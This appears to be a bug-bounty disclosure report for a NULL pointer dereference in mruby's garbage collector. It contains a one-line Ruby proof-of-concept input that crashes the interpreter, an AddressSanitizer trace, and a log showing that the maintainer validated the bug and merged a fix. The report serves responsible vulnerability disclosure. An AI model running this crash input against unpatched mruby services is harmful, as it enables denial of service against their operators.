NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Oct 8th 2021


Description

NULL pointer dereference in mrb_full_gc (src/gc.c:1325, reached via mrb_proc_copy during lambda creation)

Proof of Concept

# crash.rb -- the Ruby input that triggers the crash shown in the trace below
def lambda = super { } [lambda] = @a ... ; lambda

Result

 ~/asan/mruby/bin/mruby crash.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==354==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000018 (pc 0x556c5e8ddf2f bp 0x7ffe9a8ca4a0 sp 0x7ffe9a8ca480 T0)
==354==The signal is caused by a READ memory access.
==354==Hint: address points to the zero page.
    #0 0x556c5e8ddf2e in mrb_full_gc /root/asan/mruby/src/gc.c:1325
    #1 0x556c5e8de256 in mrb_garbage_collect /root/asan/mruby/src/gc.c:1358
    #2 0x556c5e8b58c7 in mrb_irep_incref /root/asan/mruby/src/state.c:114
    #3 0x556c5e965fd1 in mrb_proc_copy /root/asan/mruby/src/proc.c:212
    #4 0x556c5e966929 in proc_lambda /root/asan/mruby/src/proc.c:283
    #5 0x556c5e91fbb7 in mrb_vm_exec /root/asan/mruby/src/vm.c:1725
    #6 0x556c5e9112fb in mrb_vm_run /root/asan/mruby/src/vm.c:1032
    #7 0x556c5e9534d1 in mrb_top_run /root/asan/mruby/src/vm.c:2998
    #8 0x556c5e9ad4a0 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6891
    #9 0x556c5e9ad78e in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6934
    #10 0x556c5e8b5092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #11 0x7fd1ded600b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #12 0x556c5e8b242d in _start (/root/asan/mruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/src/gc.c:1325 in mrb_full_gc
==354==ABORTING
We have contacted a member of the mruby team and are waiting to hear back 2 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 2 months ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on bec074 2 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty